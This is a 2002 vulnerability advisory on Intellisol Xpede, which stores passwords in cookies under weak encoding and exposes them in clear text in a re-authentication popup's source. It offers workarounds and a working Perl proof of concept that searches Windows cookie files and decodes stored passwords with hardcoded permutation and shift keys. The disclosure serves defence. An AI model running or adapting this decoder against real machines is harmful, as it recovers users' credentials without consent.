Passwords exposed in Intellisol XPede
==========================


About Xpede
=========

quote from http://www.workforceroi.com/solutions/pa/index.shtml

"Intellisol Xpede is a browser-based time and expense entry and project cost 
management module designed to connect a remote workforce on a real-time 
basis.
Intellisol Project Accounting is designed for any professional service 
organization such as consulting, software development, law, architecture,
engineering, PR/advertising and more with between 10 and 500 million dollars 
in revenue and up to 500 employees,
and integrates with Microsoft Great Plains Business Solutions financial 
suites. "


Problems
=======

Tested with Xpede 4.1 / NT 4.0
Two security vulnerabilites has been discovered in the way Xpede handle 
users password.

1/    Xpede's cookies store users password "ciphered" in a very weak manner 
(a mix of shifts and permutations),
recovering a clear text password from there is really trivial making users 
remotely vulnerable from cross site scripting based attacks,
various MSIE bugs while users are locally vulnerable as well, by accessing 
the local filesystem (ie the cookie file) when, for instance,
a user decide to use someone else's computer or is using a computer for wich 
he shares Administrator rights with other.

2/   Passwords are shown in a clear form into the "session timeout" 
re-authentication popup source.
The dangerous guilty javascript snipet simulate a "remember password" option 
and tests if it was checked to automatically fill up the formular password 
field.
The clear password is shown as is, in the javascript source code, whatever 
the user decided to do with the option.
Indeed, a user can have a false sense of safety, leaving his host even few 
seconds without having filled up the authentication popup
and therefore exposing his password to everybody lurking at the source and, 
once again,  is remotely vulnerable to the same MSIE bugs mentionned above.


Temp workarounds
=============

1 st problem /   clear all cookies via MSIE "Tools/Internet 
Options/General/Delete Cookies" right after a session has ended
to avoid local attack and patch your browser with the latests security fixes 
if it wasn't already done
(anyway, u may fall in more serious troubles in the latter case :).

2 nd problem/  do not expose the authentication popup to unwise eyes (login 
or quit the application)  and again, patch your browser for remote attacks.


Additionnaly for paranoids, i suggest to close all MSIE running windows 
before accessing Xpede application (and during the session).



Vendor status
=========

The vendor has been contacted on March 13. and as far as i know, is 
currently working on a patch,
in the meantime, u may want to use the above workarounds.



Versions
======

Xpede support team has reported that both Xpede 4.1 and 7.x series were 
affected by these vulnerabilities.


Author & Date
===========

Gregory Duchemin (c3rb3r@hotmail.com)
20 March 2002.


Have a nice day.



Proof of concept (password recovery from cookies)
====================================

#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede passwords stored in these damn 
cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March 2002
#
#output format

format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.


#Cookie fingerprint
$signature="defPWD";



#decoding stuff
@PERMU=('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5');
@ALPHA=('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 
'N', 'O', 'P', 'Q', 'R','S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 
'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);


#Change the following path to match your system
@COOKIE= glob('c:\winnt\Profiles\*\Cookies\*@*.txt');



$i=$count=0;
@FOUND= ('nope');

print "\n\nXdeep.pl  Xpede cookies finder and decoder \n\n-- Gregory 
Duchemin (Aka C3rb3r) ^ Feb 2002 --\n\n\n";

foreach $try (@COOKIE) {
$count++;
if (open(handle, $try))
{
@lines=<handle>;
if (!index($lines[0], $signature))
{
printf("\n+ Xpede cookie found ! yep :)  <=>  %s\n", $try);
$FOUND[$i]=$try;
$i++;
}
close(handle);
}

}

printf("\n+ %d files checked.\n", $count);

if (! $i)
{
print "\n\n- No Xpede cookie found, sorry\n\n";
exit(0);
}

printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
$try=<STDIN>;

foreach $try (@FOUND) {

if (open(handle, $try))
{
@lines=<handle>;

$userid= @lines[55];
$realname=@lines[64];
$password=@lines[46];
$company=@lines[28];

$realname =~ s/\+/ /;
$userid =~ s/\+/ /;
$password =~ s/\+/ /;
$company =~ s/\+/ /;

$userid =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
$realname =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
$password =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
$company =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;

printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
write;
print "\n\n! Cr4cking 1n progr3ss ... \n";

@list=split //, $password;




if (length($password) > 12 )
{
$MAX = 11;
$DIFF = length($password)-1-$MAX;
for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list[$i]; }
splice(@list, 0, ($DIFF));
printf "\n+ Clear part is %s\n", $REST;
}
else {$MAX = length($password)-1;printf "\n- No clear part found \n";}



for ($i=0; $i<$MAX; $i) { $temp_pass = $temp_pass.$list[$PERMU[$i++]-1]; }
printf "\n+ Permutations give %s\n", $temp_pass;


@list=split //, $temp_pass;
for ($i=0; $i<$MAX; $i++)
{
$b = ord($list[$i]);
$c = $SHIFT[$i];
$flag=0;


for ($z=0; $z<52; $z+=1)
{
if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA[($z+$c)%52]);$flag=1;}
}

if (!$flag) {$a = $b;}


$decode = $decode.chr($a);
printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr($a);
}

printf "\n\n+ Shifting with secret key give %s\n", $decode;
printf "\n! Password is \"%s\"\n\n", $decode.$REST;
printf "\n\n- End.\n\n";

$decode=$REST=$temp_pass="";
close(handle);

print "\n\n[Press return]\n";
$try=<STDIN>;
}
}







_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com